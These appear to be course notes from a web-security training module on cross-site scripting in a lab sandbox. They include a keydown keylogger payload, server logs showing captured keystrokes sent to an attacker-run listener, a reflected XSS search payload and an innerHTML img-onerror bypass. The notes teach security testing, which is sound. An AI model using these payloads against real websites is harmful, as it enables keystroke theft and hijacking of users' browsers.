Module 5: Cross-Site Scripting Introduction and Discovery

Introduction to the Sandbox

Accessing the Sandbox

Start the VPN and start the VM. Add the IP to hosts file.

Understanding the Sandbox

Explaining the sandbox webpage.

JavaScript Basics for Offensive Uses

Syntax Overview

Function example

01  function processData(data) {
02    data.items.forEach(item => {
03      console.log(item)
04    });
05  }
06
07  let foo = {
08    items: [
09      "Hello",
10      "Zdravo",
11      "Hola"
12    ]
13  }
14
15  processData(foo)

Useful APIs

Logging inputs
logKey function
Capturing Key stroke
Typing into Eval

Starting HTTP listener

kali@kali:~$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
Using fetch

HTTP Server Log

kali@kali:~$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
172.16.174.4 - - [11/Aug/2021 19:15:53] "GET /hello HTTP/1.1" 404 -

Original Keylogging Payload

function logKey(event){
	console.log(event.key)
}

document.addEventListener('keydown', logKey);
Sending keystrokes back

HTTP Server Log

...
192.168.121.101 - - [11/Aug/2021 19:23:39] "GET /k?key=I HTTP/1.1" 404 -
192.168.121.101 - - [11/Aug/2021 19:23:39] code 404, message File not found
192.168.121.101 - - [11/Aug/2021 19:23:39] "GET /k?key= HTTP/1.1" 404 -
192.168.121.101 - - [11/Aug/2021 19:23:39] code 404, message File not found
192.168.121.101 - - [11/Aug/2021 19:23:39] "GET /k?key=l HTTP/1.1" 404 -
192.168.121.101 - - [11/Aug/2021 19:23:40] code 404, message File not found
192.168.121.101 - - [11/Aug/2021 19:23:40] "GET /k?key=i HTTP/1.1" 404 -
192.168.121.101 - - [11/Aug/2021 19:23:40] code 404, message File not found
192.168.121.101 - - [11/Aug/2021 19:23:40] "GET /k?key=k HTTP/1.1" 404 -
192.168.121.101 - - [11/Aug/2021 19:23:40] code 404, message File not found
192.168.121.101 - - [11/Aug/2021 19:23:40] "GET /k?key=e HTTP/1.1" 404 -
...

Cross-Site Scripting - Discovery

Reflected Server XSS

Often found in locations where user input is sent via GET parameters.

Searchin for "offsec"
Inspecting "offsec"

It's inside a <div> tag, it may be vulnerable. Testing with HTML injection has less potential for error — this doesn't always mean we can inject JavaScript but is a great indicator.

Injecting HTML to Search
Search Alert box

Encoded search payload

search.php?s=%3Cscript%3Ealert(0)%3C/script%3E
XSS rendered on Victim - Search
Reviewing HTTP Response in Burp Suite

Stored Server XSS

Leaving a comment
Blog Comment Inspection
Sanitized Comment
Inspecting Sanitized Comment
Raw HTML of Comment
H1 in Username
Rendered H1
XSS payload in Blog Comment
Executing XSS Payload using Target User Browser

Reflected Client XSS

Survey Home Page
Survey HTML Injection
Finding Request in the Network Tools
Viewing the Response Payload
Reviewing Survey.js
Payload not executing in Client XSS
Reviewing Injection Point

Mozilla's innerHTML Bypass

const name = "<img src='x' onerror='alert(1)'>";
el.innerHTML = name; // shows the alert
Exploiting with Mozilla's Bypass

Stored Client XSS

Summary of Answers
HTML in Survey
Rendered HTML in Survey
XSS Payload in Survey
Alert Box on Result Page
Alert Box in Victim's Browser
PreviousModule 4: Introduction to Burp SuiteNextModule 6: Cross-Site Scripting Exploitation and Case Study

Last updated